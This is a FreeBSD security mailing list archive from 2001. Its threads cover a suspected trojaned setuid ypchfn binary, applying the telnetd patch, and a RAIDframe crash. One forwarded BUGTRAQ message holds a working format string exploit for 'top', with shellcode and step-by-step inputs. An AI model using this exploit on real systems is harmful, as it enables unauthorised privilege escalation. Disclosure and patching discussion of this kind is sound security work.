(PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.4/8.11.4) with ESMTP id f6OHm3Q45161; Tue, 24 Jul 2001 13:48:07 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Tue, 24 Jul 2001 13:47:58 -0400 (EDT) From: Rob Simmons To: Jon Loeliger Cc: Subject: Re: Security Check Diffs Question In-Reply-To: <200107241632.LAA05639@chrome.jdl.com> Message-ID: <20010724134421.I44940-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 If you have access to the same binaries on another machine, run ident against both. If there are _no_ RCS keyword strings in the questionable binaries, there is definitely a problem. Robert Simmons Systems Administrator http://www.wlcg.com/ On Tue, 24 Jul 2001, Jon Loeliger wrote: > Hi Folks, > > This morning, on a machine that's been up for 33 days, > I suddenly saw these /etc/security diffs: > > setuid diffs: > 20,22c20,22 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > --- > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > 53,55c53,55 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > --- > > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > > > So, how paranoid am I here? How concerned am I? > What compromised of my system just took place? > Couple things to notice: > > - The files now take fewer 512K blocks, > but their sizes are the same? > > - Most of the inodes staid the same. Exact same. > Are these hard linked files? Should be, right? > > - The inode for ypchfn changed! > It's no longer hard linked, right? > > No form of disk restructuring, fsck, defrag, etc, was initiated by me. > > Note that: > > www 181 # cmp /usr/bin/{ypchpass,ypchfn} > /usr/bin/ypchpass /usr/bin/ypchfn differ: char 25, line 1 > > Here is a `strings /usr/bin/ypchfn`: > > www 182 # strings /usr/bin/ypchfn > /usr/libexec/ld-elf.so.1 > FreeBSD > libcrypt.so.2 > _DYNAMIC > _init > __deregister_frame_info > crypt > strcmp > _fini > _GLOBAL_OFFSET_TABLE_ > __register_frame_info > libc.so.4 > strerror > execl > environ > fprintf > __progname > __error > setgid > __sF > execv > getpwuid > getpwnam > atexit > exit > strchr > execvp > setuid > _etext > _edata > __bss_start > _end > 8/u > QR2cc.wsLFbKU > root > > If someone didn't hack my system, I took a disk hit and lost > part of that file, right? > > What other log files am I disecting or where else am I poking > for further evidence? > > Am I blowing away the bogus(?) /usr/bin/ypchfn and re-making > it a hard link to the others again? > > jdl > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XbTTv8Bofna59hYRA/qmAJ94c+qf42IHuHEzpc9XTomFyoE02ACgpD2V 0paUeTayTHx4/WC6YDwkWxQ= =yz9c -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 7:24:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 46AC137B764 for ; Wed, 25 Jul 2001 07:21:01 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 45471 invoked by uid 1000); 25 Jul 2001 14:20:12 -0000 Date: Wed, 25 Jul 2001 17:20:12 +0300 From: Peter Pentchev To: Krzysztof Zaraska Cc: David G Andersen , Jon Loeliger , security@FreeBSD.ORG Subject: Re: Security Check Diffs Question Message-ID: <20010725172011.A44945@ringworld.oblivion.bg> Mail-Followup-To: Krzysztof Zaraska , David G Andersen , Jon Loeliger , security@FreeBSD.ORG References: <200107242359.f6ONx9U09628@faith.cs.utah.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from kzaraska@student.uci.agh.edu.pl on Wed, Jul 25, 2001 at 08:36:31AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jul 25, 2001 at 08:36:31AM +0200, Krzysztof Zaraska wrote: > On Tue, 24 Jul 2001, David G Andersen wrote: > > > It's probably a simple trojan with a pretty interface on it that > > says, (if username == "root", ask for their password. If crypt(input) == > > that stored password, grant access to the system). > I agree that this is the way this thing should work, but I was wondering: > I string original ypchfn and I see a bunch of lines like "no uid for %s" > resembling arguments for printf() so I guess that is ypchfn's user > interface. But in this trojan I can't see neither these lines nor > something resembling a path to the original ypchfn. So, my question is: > how does it masquerade to the user as original ypchfn not having it's user > interface inside? Or, maybe, the trojan contains ypchfn-like user > interface but it cannot be seen with by running strings on it? It does not need to contain any user interface to masquerade as the original. All it needs to do is check if it has been executed with a single arugment - a username, e.g. 'root', if this username is indeed the username it expects (to activate the trojan behavior), and if so, ask for password. If it has not been executed as ypchfn, or if there is more than one argument, or if the argument is not what it expects, all it needs to do is execute the original ypchfn. It knows that chpass, chfn etc are still hardlinks to the original binary, so it executes one of those - and voila, here's your "real" ypchfn for all to use, except for those who know how to invoke it. Of course, this particular trojan might not behave this way; I have only outlined one possible type of trojans masquerading as normal system utilities, and occassionally making use of the setuid bit. G'luck, Peter -- I had to translate this sentence into English because I could not read the original Sanskrit. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 7:28:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from pm125.knurow.sdi.tpnet.pl (pm125.knurow.sdi.tpnet.pl [213.76.190.125]) by hub.freebsd.org (Postfix) with ESMTP id 5016637B853 for ; Wed, 25 Jul 2001 07:25:38 -0700 (PDT) (envelope-from doc@lublin.t1.pl) Received: (from doc@localhost) by pm125.knurow.sdi.tpnet.pl (8.11.4/8.11.3) id f6PEPQq01760 for security@freebsd.org; Wed, 25 Jul 2001 16:25:26 +0200 (CEST) (envelope-from doc@lublin.t1.pl) Date: Wed, 25 Jul 2001 16:25:26 +0200 From: =?iso-8859-2?Q?Micha=B3_Pasternak?= To: security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010725162525.A1735@lublin.t1.pl> Reply-To: =?iso-8859-2?Q?Micha=B3_Pasternak?= References: <200107241632.LAA05639@chrome.jdl.com> <20010724134421.I44940-100000@mail.wlcg.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-2 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <20010724134421.I44940-100000@mail.wlcg.com>; from rsimmons@wlcg.com on Tue, Jul 24, 2001 at 01:47:58PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > What compromised of my system just took place? Well, I'm reading nth post in this thread .. and I have just few questions: What's the problem? We know, that someone compromised your system's security, for sure. Why don't you download system sources and rebuild everything? (*including* ports)? Or, back up your data and reinstall everything. You'll never know, what rootkits and trojans hacker could install. For example, I once saw situation, where hacked FreeBSD just restarted /or halted/ without any causes... except chmod 777 on /dev/mem and /dev/kmem. If the hacker is good, recompiling src and ports and starting with bare /etc *won't* help. -- [ Michal Pasternak doc@lublin.t1.pl +48606570000 ] [ sklepy internetowe, bazy danych, programy na zamówienie ] [ . .. ..- .- . .. http://lublin.t1.pl . .-. .--.. . . .- ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 7:36: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from chrome.jdl.com (chrome.jdl.com [209.39.144.2]) by hub.freebsd.org (Postfix) with ESMTP id F371537B64C for ; Wed, 25 Jul 2001 07:35:19 -0700 (PDT) (envelope-from jdl@chrome.jdl.com) Received: from chrome.jdl.com (localhost [127.0.0.1]) by chrome.jdl.com (8.9.1/8.9.1) with ESMTP id JAA08445; Wed, 25 Jul 2001 09:10:52 -0500 (CDT) (envelope-from jdl@chrome.jdl.com) Message-Id: <200107251410.JAA08445@chrome.jdl.com> To: Krzysztof Zaraska Cc: David G Andersen , Peter Pentchev , security@FreeBSD.ORG Subject: Re: Security Check Diffs Question In-reply-to: Your message of "Wed, 25 Jul 2001 08:36:31 +0200." Clarity-Index: null Threat-Level: none Software-Engineering-Dead-Seriousness: There's no excuse for unreadable code. Net-thought: If you meet the Buddha on the net, put him in your Kill file. Date: Wed, 25 Jul 2001 09:10:52 -0500 From: Jon Loeliger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org So, like Krzysztof Zaraska was saying to me just the other day: > On Tue, 24 Jul 2001, David G Andersen wrote: > > > It's probably a simple trojan with a pretty interface on it that > > says, (if username == "root", ask for their password. If crypt(input) == > > that stored password, grant access to the system). > > I agree that this is the way this thing should work, but I was wondering: > I string original ypchfn and I see a bunch of lines like "no uid for %s" > resembling arguments for printf() so I guess that is ypchfn's user > interface. But in this trojan I can't see neither these lines nor > something resembling a path to the original ypchfn. So, my question is: > how does it masquerade to the user as original ypchfn not having it's user > interface inside? Or, maybe, the trojan contains ypchfn-like user > interface but it cannot be seen with by running strings on it? So I'm willing to `od` this executable and send it to someone if someone is, like, seriously wanting to reverse engineer it. Or perhaps even `nm` it too. I'm personally not spending time reverse engineering it until I get a DMZ firewall in place. :-) jdl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 7:35:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from kira.epconline.net (kira2.epconline.net [209.83.132.2]) by hub.freebsd.org (Postfix) with ESMTP id 1733D37B448 for ; Wed, 25 Jul 2001 07:31:36 -0700 (PDT) (envelope-from carock@epconline.net) Received: from therock (betterguard.epconline.net [207.206.185.193]) by kira.epconline.net (8.11.4/8.11.4) with SMTP id f6PEV9P33784 for ; Wed, 25 Jul 2001 09:31:09 -0500 (CDT) From: "Chuck Rock" To: Subject: I'm having problems getting this patch installed.... Date: Wed, 25 Jul 2001 09:31:09 -0500 Message-ID: <005201c11516$72761690$1805010a@epconline.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Below is some E-mail from someone who is trying to help me. I'm having problems installing the telnetd patch on my FreeBSD 4.2 release box. Any help appreciated. Thanks, Chuck -----Original Message----- From: Chuck Rock [mailto:carock@epconline.net] Sent: Tuesday, July 24, 2001 3:56 PM To: Mike Tancsa Subject: RE: telnetd root exploit When we set them up, we use the development which is supposed to install the source code... when I ls the /usr/src/crypto, I get the following... README kerberosIV/ openssl/ heimdal/ openssh/ telnet/ In this directory... /usr/src/crypto/telnet/telnetd There are the following files. authenc.c global.c state.c telnetd.c utility.c defs.h pathnames.h sys_term.c telnetd.h ext.h slc.c telnetd.8 termstat.c This is FreeBSd 4.2 Release which the patch is supposed to work for as well. Thanks for you help. Chuck > -----Original Message----- > From: Mike Tancsa [mailto:mike@sentex.net] > Sent: Tuesday, July 24, 2001 3:40 PM > To: Chuck Rock > Subject: RE: telnetd root exploit > > > > Do you have the source code on your server ? > > ---Mike > > At 03:40 PM 7/24/01 -0500, Chuck Rock wrote: > >OK, I'm sorry I didn't read the entire post, but when trying the patch, I > >get the following. > > > >Here's the instructions for me listed in the advisory... > ># cd /usr/src/ > ># patch -p < /path/to/patch > ># cd /usr/src/libexec/telnetd > ># make depend && make all install > > > >When I type in the patch -p line, I get... > > > >Hmm... Looks like a unified diff to me... > >The text leading up to this was: > >-------------------------- > >|Index: libexec/telnetd/ext.h > >|=================================================================== > >|RCS file: /home/ncvs/src/libexec/telnetd/ext.h,v > >|retrieving revision 1.8 > >|retrieving revision 1.10 > >|diff -u -r1.8 -r1.10 > >|--- libexec/telnetd/ext.h 2000/11/19 10:01:27 1.8 > >|+++ libexec/telnetd/ext.h 2001/07/23 22:00:51 1.10 > >-------------------------- > >File to patch: > > > >How do I answer this? I'm assuming libexec/telnetd/ext.h, but I > don't want > >to screw it up. > > > >Thanks, > >Chuck > > > > > -----Original Message----- > > > From: owner-freebsd-security@FreeBSD.ORG > > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Mike Tancsa > > > Sent: Tuesday, July 24, 2001 12:48 PM > > > To: Chuck Rock; security@FreeBSD.ORG > > > Subject: RE: telnetd root exploit > > > > > > > > > At 12:42 PM 7/24/01 -0500, Chuck Rock wrote: > > > >OK, is there a how to page for installing these patches? > They aren't self > > > >evident, and the search on FreeBSD.org keeps bringing up > results from the > > > >commiters handbook... > > > > > > There are instructions in the advisory. What part are you > stuck on ? i.e. > > > post the steps you took, and where you ran into trouble. > > > > > > ---Mike > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 7:55:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id E340D37B7E3 for ; Wed, 25 Jul 2001 07:53:46 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 47724 invoked by uid 1000); 25 Jul 2001 14:52:57 -0000 Date: Wed, 25 Jul 2001 17:52:57 +0300 From: Peter Pentchev To: Chuck Rock Cc: security@FreeBSD.ORG Subject: Re: I'm having problems getting this patch installed.... Message-ID: <20010725175257.A47466@ringworld.oblivion.bg> Mail-Followup-To: Chuck Rock , security@FreeBSD.ORG References: <005201c11516$72761690$1805010a@epconline.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <005201c11516$72761690$1805010a@epconline.net>; from carock@epconline.net on Wed, Jul 25, 2001 at 09:31:09AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jul 25, 2001 at 09:31:09AM -0500, Chuck Rock wrote: > Below is some E-mail from someone who is trying to help me. I'm having > problems installing the telnetd patch on my FreeBSD 4.2 release box. Can you try running 'patch -p0 < /path/to/patch' instead of just '-p'? G'luck, Peter -- This sentence no verb. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 8:15:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from bjapp6.163.net (unknown [202.108.255.253]) by hub.freebsd.org (Postfix) with ESMTP id 0C04837B80C for ; Wed, 25 Jul 2001 08:12:56 -0700 (PDT) (envelope-from oywand@163.net) Received: from nietzsche (unknown [202.114.1.2]) by bjapp6.163.net (Postfix) with ESMTP id 84E351C6DFC01 for ; Tue, 24 Jul 2001 09:25:50 +0800 (CST) Message-ID: <002301c113df$9dea0940$8b01010a@nietzsche> From: "oyk" To: "'FreeBSD-Questions@FreeBSD.Org'" References: <9BF54A52E1DFD311BC1000D0B73EADFE043BFE6F@bell.logica.co.uk> <20010720175826.A5207@ringworld.oblivion.bg> Subject: Raidframe hot spare question Date: Tue, 24 Jul 2001 09:24:47 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2505.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2505.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I am a FreeBSD user. I download the 2001-06-20-RAIDframe-stabel.diff.gz from your corner. I installed it and could conveniently configure the RAID0 RAID1 RAID5. Many thanks to you for bringing Raidframe to FreeBSD. But, I have a troublesome question about the RAID5 configuration with hot spare. Now I show my configuration as follow (hotspare.conf): START array 1 3 1 START disks /dev/da0s1e /dev/da1s3e /dev/da2s3e START spare /dev/da3s3e START layout 32 1 1 5 START queue fifo 100 Because I had configured two RAID5 test and used /dev/raid0 & /dev/raid1, I must use /dev/raid2 to configure. Then, I do the work as the manual of raidctl. That's OK. Everything is OK. Now, I reboot my FreeBSD box. The box halted, I had to reboot by hand. After reboot, I want to use the RAID5 configuration. I command "raidctl -c /etc/hotspare.conf" , but the box reboot again itself. What a strange phenomena! I tried again, the result is the same. I don't understand. Can you tell me about it? I will wait your letter. Thank you very much. yours remote friend PS: This is the RAID5 with hot spare df information: Filesystem 1K-blocks Used Avail Capacity Mounted on /dev/ad1s1a 99183 46722 44527 51% / /dev/ad1s1f 5572507 1148536 3978171 22% /usr /dev/ad1s1e 19815 770 17460 4% /var procfs 4 4 0 100% /proc /dev/raid2c 1977111 1 1818942 0% /usr/hotmnt I has test the hot spare, it succeeds. Then, I reboot, I run fsck /dev/raid2, the system information is: Can't open /dev/raid2: Device not configured then I run raidctl -c /etc/hotspare.conf, the system reboot itself, information is: Waiting for DAG engine to start Warning: p_fd fields not set Hosed component: /dev/da1s3e raid2: Component /dev/da0s1e being configured at row: 0 col:0 Row:0 Column; 0 Num Rows: 1 Num Columns: 3 Version:2 Serial Number: 123456 Mod Counter:108 Clean: Yes Status: 0 raid2: Ignoring /dev/da1s3e raid2: Component /dev/da2s3e being configured at row; 0 col: 2 Row; 0 Column: 2 Num Rows: 1 Num Columns: 3 Version:2 Serial Number: 123456 Mod Counter:108 Clean: Yes Status: 0 WARNING: truncating disk at r 0 c 1 to 2040128 blocks WARNING: truncating disk at r 0 c 2 to 2040128 blocks panic: lockmgr: pid 317, not exclusive lock holder 316 unlocking syncing disks.... 10 8 6 4 2 done Uptime: 4m16s That's all,Now, the box halt. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 8:24:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from kira.epconline.net (kira2.epconline.net [209.83.132.2]) by hub.freebsd.org (Postfix) with ESMTP id 91D8837B7AA for ; Wed, 25 Jul 2001 08:23:59 -0700 (PDT) (envelope-from carock@epconline.net) Received: from therock (betterguard.epconline.net [207.206.185.193]) by kira.epconline.net (8.11.4/8.11.4) with SMTP id f6PFNwP39829 for ; Wed, 25 Jul 2001 10:23:59 -0500 (CDT) From: "Chuck Rock" To: Subject: RE: I'm having problems getting this patch installed.... Date: Wed, 25 Jul 2001 10:23:58 -0500 Message-ID: <005e01c1151d$d37f1340$1805010a@epconline.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <20010725175257.A47466@ringworld.oblivion.bg> Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Same results... kira(128):[/usr/src]-#patch -p0 < /root/sa-01.49/telnetd-crypto.patch Hmm... Looks like a unified diff to me... The text leading up to this was: -------------------------- |Index: libexec/telnetd/ext.h |=================================================================== |RCS file: /home/ncvs/src/libexec/telnetd/ext.h,v |retrieving revision 1.8 |retrieving revision 1.10 |diff -u -r1.8 -r1.10 |--- libexec/telnetd/ext.h 2000/11/19 10:01:27 1.8 |+++ libexec/telnetd/ext.h 2001/07/23 22:00:51 1.10 -------------------------- File to patch: > -----Original Message----- > From: Peter Pentchev [mailto:roam@orbitel.bg] > Sent: Wednesday, July 25, 2001 9:53 AM > To: Chuck Rock > Cc: security@FreeBSD.ORG > Subject: Re: I'm having problems getting this patch installed.... > > > On Wed, Jul 25, 2001 at 09:31:09AM -0500, Chuck Rock wrote: > > Below is some E-mail from someone who is trying to help me. I'm having > > problems installing the telnetd patch on my FreeBSD 4.2 release box. > > Can you try running 'patch -p0 < /path/to/patch' instead of just '-p'? > > G'luck, > Peter > > -- > This sentence no verb. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 8:50:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from web.metropark.com (unknown [209.248.134.200]) by hub.freebsd.org (Postfix) with ESMTP id 60E5037B409 for ; Wed, 25 Jul 2001 08:50:13 -0700 (PDT) (envelope-from bob@metropark.com) Received: from bob (users.metropark.com [209.248.134.245]) by web.metropark.com (8.11.1/8.11.1) with SMTP id f6NJ7Bw20182 for ; Mon, 23 Jul 2001 14:07:12 -0500 (CDT) (envelope-from bob@metropark.com) Message-ID: <033901c113aa$c65aebe0$6c01a8c0@mpcsecurity.com> From: "Robert Herrold" To: Subject: telnet Exploit Date: Mon, 23 Jul 2001 14:07:48 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0332_01C11380.DA60C080" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0332_01C11380.DA60C080 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I have never used cvsup before, and I'm a little confused about the = current possible patch/fix.=20 First off, is there a 'patch/fix/replacement for telnetd' = (/usr/libexec/telnetd). If so, would that be included in the cvsup?=20 Secondly, I've read through the cvsup documentation, and I'm a little = unclear on whether it is basically just downloading source, or is it = adding the packages. (do I need to recompile?) Any help would be greatly appreciated. Bob Herrold Senior Network Engineer Metropark Communications=20 10405 A Baur Blvd St Louis MO 63132 (314)439-1900 ------=_NextPart_000_0332_01C11380.DA60C080 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
I have never used cvsup before, and I'm = a little=20 confused about the current possible patch/fix.
 
First off, is there a = 'patch/fix/replacement for=20 telnetd' (/usr/libexec/telnetd). If so, would that be included in the = cvsup?=20
 
Secondly, I've read through the cvsup=20 documentation, and I'm a little unclear on whether it is basically just=20 downloading source, or is it adding the packages. (do I need to=20 recompile?)
 
Any help would be greatly = appreciated.
 
 
Bob Herrold
Senior Network = Engineer
Metropark=20 Communications
10405 A Baur Blvd
St Louis MO=20 63132
(314)439-1900
------=_NextPart_000_0332_01C11380.DA60C080-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 9:13:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from uj.pfi.lt (uj.pfi.lt [193.219.52.129]) by hub.freebsd.org (Postfix) with ESMTP id 4216937B41B for ; Wed, 25 Jul 2001 09:12:03 -0700 (PDT) (envelope-from tomas@megalogika.lt) Received: from tyras (megalogika.stp.lt [193.219.52.197]) by uj.pfi.lt (8.11.2/8.11.2) with SMTP id f6PFjOX01749 for ; Wed, 25 Jul 2001 17:45:26 +0200 From: "Tomas Verbaitis" To: Subject: FW (BUGTRAQ): top format string bug exploit code (exploitable) Date: Wed, 25 Jul 2001 18:11:13 +0200 Message-ID: <000801c11524$6d042a40$0601a9c0@tyras> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-4" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ahoj! is this somehow addressed at the moment? any suggestions for workarounds? ve -----Original Message----- From: SeungHyun Seo [mailto:s1980914@inhavision.inha.ac.kr] Sent: Wednesday, July 25, 2001 12:24 PM To: bugtraq@securityfocus.com Subject: top format string bug exploit code (exploitable) hi. It still seems to be affected under 3.5beta9 (including this version) someone said it's not the problem of exploitable vulnerability about 8 month ago , but it's possible to exploit though situation is difficult. following code and some procedure comments demonstrate it. possible to get kmem priviledge in the XXXXBSD which is still not patched, possible to get root priviledge in solaris . ( have to guess return address in solaris, cuz of 0x08040000 .text region occurs segfault.) i didn't test it on all other systems ... so check your systems now and if possible , do patch ! /* * freebsd x86 top exploit * affected under top-3.5beta9 ( including this version ) * * 1. get the address of .dtors from /usr/bin/top using objdump , * * 'objdump -s -j .dtors /usr/bin/top' * * 2. divide it into four parts, and set it up into an environment variable like "XSEO=" * * 3. run top, then find "your parted addresses from "kill" or "renice" command like this * * 'k %200$p' or 'r 2000 %200$p' * * 4. do exploit ! * * 'k %190u%230$hn' <== 0xbf (4) * 'k %190u%229$hn' <== 0xbf (3) * 'k %214u%228$hn' <== 0xd7 (2) * 'k %118u%227$hn' <== 0x77 (1) * * truefinder , seo@igrus.inha.ac.kr * thx mat, labman, zen-parse * */ #include #include #include #define NOP 0x90 #define BUFSIZE 2048 char fmt[]= "XSEO=" /* you would meet above things from 'k %200$p', it's confirming strings*/ "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS" /* .dtors's address in BSD*/ "\x08\xff\x04\x08" "\x09\xff\x04\x08" "\x0a\xff\x04\x08" "\x0b\xff\x04\x08" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; /* might shellcode be located 0xbfbfd6? ~ 0xbfbfde? */ char sc[]= "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80"; /* bigwaks 23 bytes shellcode */ int main(void) { char scbuf[BUFSIZE]; char *scp; scp = (char*)scbuf; memset( scbuf, NOP, BUFSIZE ); scp += ( BUFSIZE - strlen(sc) - 1); memcpy( scp, sc ,strlen(sc)); scbuf[ BUFSIZE - 1] = '\0'; memcpy( scbuf, "EGG=", 4); putenv(fmt); putenv(scbuf); system("/bin/bash"); } ++ Seo SeungHyun, Inha University Group of Research for Unix Security IGRUS / khdp.org , Host / Network Security Laboratory, 4-207 [e-mail] seo@igrus.inha.ac.kr , [Office] +82-32-860-8676 ( ROK ) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 10:43:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from uakron.edu (uakron.edu [130.101.5.4]) by hub.freebsd.org (Postfix) with ESMTP id E359637B405 for ; Wed, 25 Jul 2001 10:43:11 -0700 (PDT) (envelope-from dowdell@uakron.edu) Received: from uakron.edu ([130.101.90.200]) by uakron.edu (8.11.2/8.11.2) with ESMTP id f6PHhAh26997 for ; Wed, 25 Jul 2001 13:43:10 -0400 (EDT) Message-ID: <3B5F0538.3BD89B86@uakron.edu> Date: Wed, 25 Jul 2001 13:43:20 -0400 From: Michael Dowdell Organization: University of Akron X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: I'm having problems getting this patch installed.... References: 